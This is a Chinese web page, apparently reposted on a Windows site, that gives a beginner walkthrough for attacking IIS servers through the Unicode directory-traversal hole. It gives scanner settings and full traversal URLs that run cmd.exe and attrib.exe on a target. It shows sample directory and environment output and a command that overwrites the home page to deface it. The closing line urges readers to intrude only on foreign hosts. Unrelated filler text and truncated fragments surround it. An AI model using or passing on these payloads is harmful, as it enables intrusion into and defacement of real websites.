发布时间:2023-12-16 来源:win7旗舰版 浏览量:
网络技术是从1990年代中期发展起来的新技术,它把互联网上分散的资源融为有机整体,实现资源的全面共享和有机协作,使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享,网络则被认为是互联网发展的第三阶段。 Unicode漏洞可以说是目前最热门的漏洞了,关于Unicode漏洞原理的文章有很多了,我们初学者没有必要搞清除那些,通过本篇《Unicode漏洞入侵图文讲解》,先来看看具体的使用。 一、准备工具 Rangscan扫描器 这可是笔者扫描Unicode漏洞的必备工具 二、确定扫描范围和内容 运行Rangscan扫描器,可以看到如下界面: 如果要扫描Unicode漏洞有两处必须填入,一处是“扫描IP地址范围”,另一处是“扫描内容”。 在“扫描IP地址范围”中填入要扫描的IP范围,例如在“From:”栏中填入203.69.X.X,在“to:”中填入203.69.X.X即可。 在“扫描内容”栏中要填入: 第1种情况:如果要扫描中文Win2000的Unicode漏洞,则填入:/scripts/..%c1%1c../winnt/system32/cmd.exe 第2种情况:如果要扫描英文Win2000的Unicode漏洞,则填入:/scripts/..%c0%af../winnt/system32/cmd.exe 第3种情况:如果要扫描WinNT4的Unicode漏洞,则填入:/scripts/..%c1%9c../winnt/system32/cmd.exe 然后按“添加”按钮就把要扫描的内容添加进去了。填好扫描范围和扫描内容后,按屏幕下方的“扫描”键就开始扫描了。不要着急,要等上一段时间的。如果你所扫描的IP段有存在Unicode漏洞的主机,在软件中会有提示,并列出了存在漏洞的主机的IP 三、进入目标主机 如果在IE浏览器的地址栏输入如下命令:http://203.69.X.X/scripts/..%255c..%255cwinnt/ system32/cmd.exe?/c+dir+c:\ 就会看到类似下面的信息: Directory of c:\ 2001-06-11 03:47p 289 default.asp 2001-06-11 03:47p 289 default.htm 2001-03-09 04:35p DIR> Documents and Settings 2001-06-11 03:47p 289 index.asp 2001-06-11 03:47p 289 index.htm 2001-05-08 05:19a DIR> Inetpub 2001-05-19 10:37p DIR> MSSQL7 2001-03-09 04:22p DIR> Program Files 2001-05-23 06:21p DIR> WINNT 4 File(s) 1,156 bytes 5 Dir(s) 2,461,421,561 bytes free 这是已经看到目标主机的C盘根目录和文件了。 四、检查目标主机web页面文件存放位置 这时如果在IE浏览器的地址栏输入: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set ,一般情况下都会出现以下内容: CGI Error 注:有此信息很正常,下同。 The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: ALLUSERSPROFILE=C:\Documents and Settings\All Users CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=ON ComSpec=C:\WINNT\system32\cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=x.x.x.x HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90) HTTP_ACCEPT_ENCODING=gzip, deflate HTTPS=off INSTANCE_ID=1 LOCAL_ADDR=x.x.x.x NUMBER_OF_PROCESSORS=1 Os2LibPath=C:\WINNT\system32\os2\dll; OS=Windows_NT Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN PATH_TRANSLATED=c:\inetpub\wwwroot PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Fa 现在,已看到目标主机的环境变量了,从中弄清楚主页文件所放路径,在本例中是放在c:\inetpub\wwwroot文件夹下。然后用命令: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd.exe?/ c+dir+c:\inetpub\wwwroot 就可以看到c:\inetpub\wwwroot文件夹下的文件了,这里一般会有default.asp,default.htm,index.asp, index.htm等文件,这些就是默认的主页文件,当然每台机器、每个管理员设置的都会有所不同,具体情况请具体分析。 五、判断是否有权 找到web页面所在目录后,就要判断一下是否有权修改对方网页文件。首先要确定文件是否可读写,用下面的命令来判断(假设主页文件所放路径为c:\inetpub\wwwroot\index.asp): http://x.x.x.x/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 1.如果出现下面英文: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 就是可以修改对方的网页了。 2.如果出现下面英文: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: Access denied - C:\inetpub\wwwroot\index.asp 说明权限不够,还是放弃吧。 六、修改目标主机的web文件 要修改目标主机的web文件,常用到的方法是利用echo回显以及管道工具“>”和“>>”。我们首先要确定文件是否可读写,我们用命令来试试: http://x.x.x.x/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+台湾是中国不可分割的一部分+> c:\inetpub\wwwroot\index.asp 当看到下面的提示时: CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are: 这就已经成功修改了目标主机的网页了!当在浏览器地址栏键入目标主机的网址,浏览该网站时,你会看到网页上有“台湾是中国不可分割的一部分”几个字,除此以外一片空白 当然你也可以把那几个字换成“您的网站有漏洞”,随你喜欢了! 没看懂?没关系,当初我也是看不明白类似的文章,但按文章上所说的去实践了以后,就慢慢的懂了——实践出真知!这话没错!当然,如果能做到理论与实践相结合那就更好了!要学习技术,理论联系实践是最好的方法和老师。最后,再次提醒各位入侵爱好者,一定不要入侵国内的主机,法律无情啊! 网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。 |
Unicode漏洞可以说是目前最热门的漏洞了,关于Unicode漏洞原理的文章有很多了,我们初学者
一、UNICODE漏洞的原理 此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+II